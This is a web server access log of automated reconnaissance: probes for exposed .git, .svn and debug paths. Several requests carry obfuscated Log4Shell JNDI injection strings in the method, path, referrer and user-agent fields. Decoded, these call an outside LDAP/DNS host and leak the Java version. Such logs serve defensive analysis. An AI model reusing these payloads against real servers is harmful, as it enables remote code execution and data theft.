34.19.127.192 - - [29/Jul/2026:02:28:28 +0000] "GET /server-info HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:28 +0000] "GET / HTTP/2.0" 200 11229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [29/Jul/2026:02:28:28 +0000] "ZSDLKFJ2 /${${a58y:-j}${p:bk:sx:-n}${vlia:cz:-d}${hkt:z:haf:-i}${ikj4:g1:i:-:}${nz:dzg:xb:-l}${euk:6kf:-d}${jku4:o:-a}${d:md:-p}${ac:-:}${nplf:l6:-/}${p:m0x:-/}${89ys:o1:ck:-P}${5xf:vj:-A}${xi8k:m:w0:-l}${l8z:-0}${2e7:g:-c}${l6:--}${${al4:t:-s}${xfc:9yp6:-y}${t50u:e:n0y:-s}${8:-:}${hka:-j}${z:7vx:-a}${v:6a:-v}${it:l78:fzj:-a}${msjk:-.}${h69f:pmc:-v}${0z:o:2z7:-e}${nq:mdrt:yvt:-r}${9:gp5:-s}${9cla:wu:kr:-i}${cta:bnc1:-o}${n9q:6oq:-n}}${7u:7hc0:pfw:-.}${w7:o:o4um:-1}${5:2l3:gv:-6}${n:td:-b}${0p:xpbm:-d}${u:-9}${qldf:-0}${9fr7:ne6:0:-8}${gzi:rm4:-f}${bpq:-2}${a:nlz7:-9}${bzs:86r:yz3a:-c}${rme:-e}${u31f:-e}${ead:fv4:-5}${e03h:-f}${yrv:-4}${bm:-a}${mv90:f:-3}${3:-1}${a:-6}${6:-b}${lqo7:-d}${2k:-1}${il1:-a}${nvo:vi0:-4}${q3:jx3f:-c}${7w0z:-c}${at:-5}${uba0:ymip:-e}${z3fy:j:6j:-a}${jtyb:xz:ipo:-e}${y:-9}${17:-3}${5g:wqt:-3}${w4h5:7dj:-8}${fv:6l:-f}${b:-d}${dmyw:-9}${r4:-0}${dn4:lb5s:53:-e}${a:-2}${gf:-a}${cl:-.}${dr:r:-d}${t283:g0v:-n}${bg:7:jz:-s}${5:--}${r3b:0:-e}${qy:1b4u:r:-x}${x1:u:p:-f}${m0:p5:-i}${aueb:9r:qv1e:-l}${ao:-.}${hjo:phg2:c3:-m}${m:-a}${w:9:-s}${t6:8r:wg:-m}${e:-c}${ut0:sjix:p7:-o}${u7v:o:-r}${1jzx:zt7h:-e}${b:--}${i:-c}${p3:0qvf:vae:-f}${mbo:--}${qxy:g:-p}${48:-r}${37:fk5:-o}${3uy7:4:b27:-d}${h:ow:--}${uvrw:-0}${8l:-2}${7r:-.}${wb:-m}${a:u:-a}${zv:vk:1mtw:-s}${r1:y30x:x:-m}${h05:m:5:-.}${rdom:-c}${wp2:3b:nlfp:-l}${vksc:s:-o}${n7vi:dw:j6:-u}${56:k:vxi9:-d}${r36z:le7:-f}${w3:6d:-e}${b6l:-r}${n:-r}${v3:3x0:-y}${m:-.}${b:i7kb:j:-g}${o:a:-o}${mky:k5x2:r:-o}${nw8:2sn:a:-g}} HTTP/2.0" 404 - "-" "${${6:c:-j}${17:ma:0vtd:-n}${xnos:fgqr:l:-d}${ht48:at:6y7:-i}${1:-:}${wm:8wp:kn0:-l}${s:-d}${cf:-a}${wn6d:-p}${g:z3b:n:-:}${iok0:q2j6:-/}${35fb:fb8l:-/}${5:-U}${c:y:hsmz:-A}${w:-l}${f:y7:-0}${6:-c}${xpc:--}${${9q:-s}${ygp:-y}${mv:-s}${2yf7:-:}${4pn2:en4k:-j}${0:-a}${v:dis:-v}${lskv:jd3w:7:-a}${67v:-.}${d2qg:-v}${i:-e}${0:-r}${z:p9:s5:-s}${qj:6d:v:-i}${qk:cgl:2:-o}${wl:pd:9k:-n}}${5zdn:i6b:-.}${f0:h:fx:-1}${s5:i59a:-6}${2gqm:wqzo:-b}${2:-d}${7:-9}${wi59:s:-0}${xf:-8}${9ou:7tf2:-f}${tj1:rx:-2}${ov:e:frc:-9}${ums:pr:-c}${a:d4ir:m9i:-e}${5:f9:-e}${e:era0:-5}${y:fd:u:-f}${9:qx2:-4}${3oqc:qu:m:-a}${jb6p:-3}${a:b6z1:-1}${c1:z6:kn:-6}${wc:-b}${yz:-d}${4t:-1}${5z:xl9p:-a}${h:cqg:-4}${3e5:q5b3:-c}${k:0:-c}${in4:n2:-5}${e2:tpny:-e}${muw:3zt:0ul:-a}${jp:32s:-e}${4m1k:c1v:dwf3:-9}${a4y3:w5:-3}${1u:6h:-3}${8m:y:p:-8}${1m7:3:-f}${5m:-d}${ft:-9}${d:7zy6:-0}${8evc:se:d62:-e}${puy:2tf:-2}${us9f:uj5:-a}${2f:4:-.}${pn:2epg:-d}${1d:-n}${pg:-s}${aht:f:oaby:--}${u:tcl:-e}${0z1:-x}${o:-f}${5:5:c0:-i}${6za:-l}${su8k:wi:-.}${mf:ip:-m}${les:-a}${48:0td:-s}${dc3k:-m}${ds:-c}${ld:ft:-o}${ug:-r}${l8j2:ha:-e}${4:--}${day4:-c}${3c:p5m:-f}${wo:--}${x:-p}${gk42:pea7:iy:-r}${slv:sk:-o}${n:i:foqj:-d}${i:po:1k4i:--}${t:bsl0:-0}${dr:-2}${2:u38z:-.}${yqk:s:uw6:-m}${84jr:o1ru:2:-a}${8:-s}${9f4:ie:-m}${1:973g:-.}${7v:6:v:-c}${sl:s5hj:9k:-l}${9:bq7z:-o}${l6:r2:u:-u}${a:-d}${41:zl7t:-f}${b9s:m:-e}${nep:j7i:9f:-r}${n:qnx:rv3:-r}${2:-y}${n:tpqw:04d:-.}${m:g:-g}${d7s:8l:-o}${b3:tkw7:to:-o}${gyme:-g}}"
34.19.127.212 - - [29/Jul/2026:02:28:29 +0000] "GET /.git HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.62 - - [29/Jul/2026:02:28:29 +0000] "PUT /${${i5l:i02n:ou0:-j}${w0o:-n}${p8:wyq2:hz:-d}${ye6v:zg:-i}${5c:jas:-:}${n8b:z3v:0:-l}${vl1:hu:-d}${t:-a}${yvem:at:ebo:-p}${3:-:}${h:-/}${t:-/}${958t:-P}${1ds:dr:t8:-A}${tq0:c0z:5:-l}${8k:63m8:f8m0:-0}${p4:-c}${n7u:--}${${qv:-s}${qm:ha8:-y}${d3a2:-s}${y:4pa:7:-:}${9wbz:-j}${fy7q:nr:m:-a}${vbg:b0:i40o:-v}${elq6:-a}${7yh:arz:a0:-.}${dlj2:6y:uip8:-v}${y:w:-e}${kr:h7:-r}${w:lk27:-s}${i:j05i:-i}${u:-o}${d8:zn:x:-n}}${5n:se:tno:-.}${x1:h:-c}${52hm:5zm2:d:-c}${3q:wr:lcq:-4}${9pw:x:gksh:-7}${rl:-d}${oy3e:ktvf:-0}${0oj:-1}${t:ydac:utd:-1}${d:-b}${w:r:-3}${b19:-7}${khwy:e:-8}${se:jye:uh7:-0}${j5ab:sh:-0}${2lz:yi:7:-5}${th5:lm1:l:-d}${xt2m:ylp:-6}${f:vjt:-2}${56l:-5}${rsa:-b}${zxg:z5k:-f}${41b:-e}${3xd:7:-c}${7q6:fp:ufhn:-9}${o6kd:02j6:fj:-e}${z:-f}${dnp:g:-0}${bglj:mxz:-a}${b:l83x:fwi:-c}${6w4:a:c:-3}${im:-7}${hez:-5}${fr:ec:-3}${702:iof:-3}${wxsc:j:-8}${fk:e2:it:-f}${20te:-d}${tuvz:q27t:8rbg:-9}${l8:-0}${r3:zb:soj:-e}${u4jd:am:kx65:-2}${xpry:gfr:-a}${avg6:ftc:-.}${3z95:-d}${lo:ce:-n}${p:fbk6:-s}${sn:b2t:--}${8:rgz:z:-e}${x1:l:-x}${o0z:evf8:-f}${gh8v:57l:-i}${rtj:86:km:-l}${te:-.}${u:sp:kf6:-m}${hu:-a}${l807:-s}${9u:0:706i:-m}${9rqv:-c}${wg:7pw:4:-o}${275:c:j:-r}${jh:dcy7:y:-e}${fdzb:--}${39nj:2:ysqh:-c}${n4f1:-f}${3:p:--}${f:-p}${lx8i:-r}${7:jk:-o}${qan:2:37j:-d}${ze4:e:iu:--}${x:-0}${80e:r:-2}${v908:6sri:-.}${c07b:d:-m}${8hk5:q4ef:w30:-a}${7de:f6:-s}${yl:gz:-m}${wf:-.}${de3f:-c}${t:u1:cfoa:-l}${6f:i:-o}${coeq:-u}${2b3:2:-d}${hg3:i1p:q8:-f}${c8:xc1:-e}${5:-r}${sx0v:t6c:-r}${fq:fe:-y}${k0xm:xeso:-.}${ur2:x2h:-g}${v:y:ix:-o}${goua:befu:dn49:-o}${k:-g}} HTTP/2.0" 404 - "${${ifw:dpo9:-j}${3ni:-n}${3m:om:1w9:-d}${ader:y8:4:-i}${rh:-:}${x4qn:-l}${hqe4:1i:-d}${s:wd:-a}${5:x0kt:-p}${m:tyvb:-:}${jt:x:v:-/}${jp1a:9bo:-/}${3bp:-R}${8j:d9:-E}${fauz:i:-l}${w3:5exw:-0}${fa:y8h:4lb:-c}${reo:b48v:vh:--}${${8ym:-s}${j3dm:-y}${gi2:r:-s}${grd:pj27:-:}${6bn7:-j}${c:c6:-a}${jl:-v}${jich:-a}${2x:3si:ku68:-.}${4985:6w0:-v}${v3re:9az3:0:-e}${etn:-r}${jh2:-s}${2:-i}${o:-o}${6la1:e:-n}}${hbxu:y:ns:-.}${j:4u:h:-c}${4:6wt:-c}${nd4:ml:-4}${025s:4nzo:jpe:-7}${1wts:m:-d}${e2jh:nawx:-0}${gi:8:39:-1}${w8l:vqjw:flzc:-1}${9gy:-b}${w:2fo:-3}${k6:ch6:ebk:-7}${l2e:-8}${i:9cgy:-0}${a:hd:-0}${06g5:cp:-5}${bin:-d}${0:-6}${nh4:c9:a:-2}${u3lm:z:48:-5}${iyt8:21v:-b}${9ic:d:o59b:-f}${0:ru:-e}${d8bh:gv:-c}${b:-9}${b3ji:e:-e}${dn:9k6p:-f}${w0p:-0}${zn:-a}${z6r:-c}${owj:-3}${w:st:4mb2:-7}${c13:3:-5}${8tw:-3}${a3:ey:4rf3:-3}${i:r6:r:-8}${o:3w4:-f}${5ms:s:-d}${d:-9}${l6y:jl:-0}${q6:d:-e}${5i:-2}${hrb8:v:9br:-a}${s:-.}${hf5e:-d}${039u:-n}${j:-s}${zk:--}${8:-e}${fk3:-x}${u:-f}${h7u:b14:61sh:-i}${zf:pw:2:-l}${o:7d:-.}${g1:af:-m}${j7:c:ql:-a}${i8:iy:-s}${bo:rl5:6e:-m}${g0:-c}${9lwa:-o}${7ser:-r}${ih:m4z:-e}${noyq:--}${kp1f:07o:a:-c}${8:-f}${3j:q:--}${akg8:ap:-p}${u6:hm:d:-r}${h:-o}${nlp:k3:x3f:-d}${bm:pnkt:--}${7sr5:-0}${codm:s:-2}${yrx:-.}${qv:-m}${iwtx:-a}${12t7:e:-s}${w6jq:cp:j6o:-m}${a:81av:6dfq:-.}${zu:-c}${yir:z6:da:-l}${k:h7y:-o}${29:-u}${a:-d}${z3lc:-f}${p:eg:-e}${4:8p:kvof:-r}${z6lc:-r}${cgfj:ubo:jylt:-y}${g5:-.}${r:7:-g}${f:qn:qln1:-o}${7:kd1:-o}${fk3:-g}}" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:29 +0000] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:29 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:29 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.52 - - [29/Jul/2026:02:28:29 +0000] "POST /login HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.127.177 - - [29/Jul/2026:02:28:29 +0000] "GET /.git HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.59 - - [29/Jul/2026:02:28:29 +0000] "GET /debug/pprof HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.178 - - [29/Jul/2026:02:28:29 +0000] "GET /debug/pprof HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [29/Jul/2026:02:28:29 +0000] "POST /login HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.127.192 - - [29/Jul/2026:02:28:29 +0000] "GET /debug/pprof HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:29 +0000] "GET /.git/config HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [29/Jul/2026:02:28:29 +0000] "PUT /${${e:3k:-j}${wn7:-n}${u:-d}${rw9z:k:b9c5:-i}${xlc:b:-:}${y:hoty:-l}${xw:-d}${h1k:tgyn:-a}${4:jre:-p}${4qbt:-:}${icar:-/}${1:-/}${40:t:-P}${o:2q0:-A}${q47f:nbwj:-l}${n:zl:i:-0}${s:k9:-c}${m:--}${${n:73f:pb:-s}${nk9j:w5i:h:-y}${m39s:n:-s}${5:o91:-:}${vnm9:-j}${id:1r:-a}${utmr:e:k6z:-v}${lmu:xriv:vkae:-a}${os:h95o:-.}${z:-v}${2i:r95:c:-e}${pz:52:6:-r}${o6:-s}${g:86:a:-i}${h:5:o9:-o}${zl:vcp7:eb:-n}}${3:c8:5d:-.}${dsr:oh:ptb:-1}${30tq:r:-6}${n:m:7i:-b}${wz8:1oey:-d}${2:h0l:4g:-9}${3c:-0}${f:-8}${n:pk:-f}${p7gx:or7u:3kj:-2}${wlq:0:-9}${bvu6:-c}${dl:glh:1n:-e}${t:5b6:fk:-e}${v12u:pe:-5}${dq4:v6zj:-f}${menu:-4}${rlt:ok3:-a}${q:i4:-3}${6ik:-1}${gp:rgom:ohdz:-6}${6fzi:fvh4:-b}${a:21:-d}${2ek:9:-1}${v:u:-a}${4:-4}${x6b:d2:nzf:-c}${ks4:-c}${k4nd:-5}${cqd:5:-e}${2v3j:gad:-a}${1vzj:1aos:-e}${o:4e:wbl:-9}${rpf:-3}${9:-3}${r:-8}${w4o:-f}${u:s9z:ie:-d}${o:d1:-9}${b:49k:ir:-0}${b:lufa:-e}${5:geo:j:-2}${3vj6:y0:-a}${7:-.}${w:-d}${e:y7:-n}${j7wt:ogx:9706:-s}${elo4:gm:v6c:--}${3q:c7:-e}${j:-x}${m:s:gt:-f}${q:-i}${ie:jsm5:-l}${4cry:50hb:6d:-.}${rz2:ks0y:h7b:-m}${jh:1r93:d0j:-a}${vi:-s}${z:o52b:-m}${gd:-c}${n8u:avdn:-o}${b3qv:ti7c:-r}${u03q:7:613:-e}${4mzj:--}${u5w:-c}${q5cm:my:-f}${eft:a18u:--}${goci:-p}${e0z:24gf:-r}${h1zy:-o}${o2kg:-d}${o0s1:vaw6:k:--}${e:nh89:-0}${etm7:dl4k:nuik:-2}${abym:g8:-.}${fw1h:-m}${r:mf:m1qz:-a}${is0h:sj:-s}${g80a:b36h:-m}${7i5:-.}${iy:nt:nhk:-c}${so6:p7g:-l}${y:-o}${bs:-u}${gv:-d}${tp3o:cu:-f}${4qdt:h0b1:-e}${2o:wukn:uo05:-r}${re:-r}${x:ic:-y}${g:xy5g:-.}${u:g7:aosd:-g}${9:xthd:-o}${zsp:-o}${ro2t:x:ka:-g}} HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:29 +0000] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:29 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:29 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.177 - - [29/Jul/2026:02:28:29 +0000] "GET /.git/config HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:30 +0000] "GET /api HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:30 +0000] "GET /.hg HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.177 - - [29/Jul/2026:02:28:30 +0000] "GET /.hg HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:30 +0000] "GET /api HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:30 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:30 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:30 +0000] "GET /api/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:31 +0000] "GET /.bzr HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.177 - - [29/Jul/2026:02:28:31 +0000] "GET /.bzr HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:31 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:31 +0000] "GET /api/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:31 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:31 +0000] "GET /api/v1 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:31 +0000] "GET /.svn HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.177 - - [29/Jul/2026:02:28:31 +0000] "GET /.svn HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v1 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v1/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:32 +0000] "GET /.svn/entries HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.177 - - [29/Jul/2026:02:28:32 +0000] "GET /.svn/entries HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v1/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:32 +0000] "GET /api/v2 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.212 - - [29/Jul/2026:02:28:33 +0000] "GET /.svn/prop-base HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.177 - - [29/Jul/2026:02:28:33 +0000] "GET /.svn/prop-base HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:33 +0000] "GET /api/v2 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:33 +0000] "GET /api/v2/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:33 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:33 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:34 +0000] "GET /api/v2/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:34 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:34 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:34 +0000] "GET /api/v3 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:34 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:34 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:34 +0000] "GET /api/v3/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:35 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:35 +0000] "GET /api/v3/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:35 +0000] "GET /api/v3 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:36 +0000] "GET /docs HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:36 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:36 +0000] "GET /docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:36 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
